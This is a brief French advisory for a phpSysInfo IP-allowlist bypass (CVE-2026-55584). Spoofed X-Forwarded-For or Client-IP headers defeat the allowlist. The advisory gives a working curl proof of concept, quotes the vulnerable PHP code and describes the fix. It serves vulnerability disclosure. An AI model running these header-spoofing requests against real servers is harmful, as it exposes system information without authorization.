
CVE-2026-55584 — Contournement de la liste d'autorisation IP de phpSysInfo
CWE-290, CVSS 7.5 (Élevé), phpSysInfo <= 3.4.5
Références : GHSA-786w-p5pm-cvgh, CVE.org
PSI_ALLOWED résout l'adresse IP du client à partir des en-têtes contrôlés par l'attaquant X-Forwarded-For (puis Client-IP) avant de revenir à REMOTE_ADDR. Il n'existe aucun concept de proxy de confiance, de sorte que l'usurpation d'une adresse IP autorisée neutralise la liste blanche et expose toutes les informations système via xml.php.
PoC :
# allowlist set to an address the attacker doesn't own (ALLOWED=8.8.8.8)
curl -s http://target/xml.php # "Client IP address (...) not allowed."
curl -s -H "X-Forwarded-For: 8.8.8.8" http://target/xml.php # bypass, full XML
curl -s -H "Client-IP: 8.8.8.8" http://target/xml.php # bypass, full XML
Code vulnérable (read_config.php) :
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
$ip = $_SERVER["HTTP_CLIENT_IP"];
} else {
$ip = $_SERVER["REMOTE_ADDR"]; // only trustworthy source, checked last
}
Corrigé en 3.4.6 (019fa2d) : utilise REMOTE_ADDR par défaut ; ne respecte X-Forwarded-For / Client-IP que depuis des proxys de confiance configurés.
Signalé par Muhammed Mirac Kayıkci